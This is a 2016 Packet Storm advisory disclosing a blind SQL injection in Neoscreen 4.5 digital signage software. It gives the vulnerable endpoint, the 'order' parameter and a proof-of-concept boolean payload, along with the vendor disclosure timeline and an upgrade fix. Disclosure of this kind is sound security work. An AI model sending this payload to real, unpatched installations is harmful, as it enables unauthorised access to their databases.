Neoscreen 4.5 Blind SQL Injection

2016-07-25T00:00:00
ID PACKETSTORM:138030
Type packetstorm
Reporter Alex Haynes
Modified 2016-07-25T00:00:00

Description

                                        
                                            `Exploit Title: Neoscreen Blind SQL injection  
Product: Neoscreen by Cube Digital Media  
Vulnerable Versions: 4.5 and all previous versions  
Tested Version: 4.5  
Advisory Publication: July 24, 2016  
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]  
CVE Reference: NONE  
Credit: Alex Haynes  
  
Advisory Details:  
  
  
(1) Vendor & Product Description  
--------------------------------  
  
Vendor:  
Cube Digital Media  
  
Product & Version:  
Neoscreen digital signage software v4.5  
  
Vendor URL & Download:  
http://www.cube-display.fr  
  
Product Description:  
"Neoscreen is an innovative, scalable and particularly powerful communication system.   
With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world. "  
  
  
(2) Vulnerability Details:  
--------------------------  
Several URL's in the management software are vulnerable to SQL injection attacks.  
  
Proof of concept:  
  
POST TO /cubelocal/modules/neoscreen/admindiff/stats_diffusion.asp?mod_stat=&machine_id=0&idpod=0 HTTP/1.1  
  
Vulnerable parameter: order  
  
Payload:  
  
idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015&order=IIF(5968=5968,5968,1/0)&orders=0  
  
  
(3) Advisory Timeline:  
----------------------  
25/01/2016 - First Contact: vendor responds saying they are working on fix  
24/02/2016 - Follow up e-mail to request fix timeline. No vendor response.  
03/03/2016 - Follow up e-mail to request fix timeline.  
04/03/2016 - Vendor responds saying fix will be available 14/03/2016.  
  
  
(4)Solution:  
------------  
Upgrade to version 5.0  
  
  
(5) Credits:  
------------  
Discovered by Alex Haynes  
`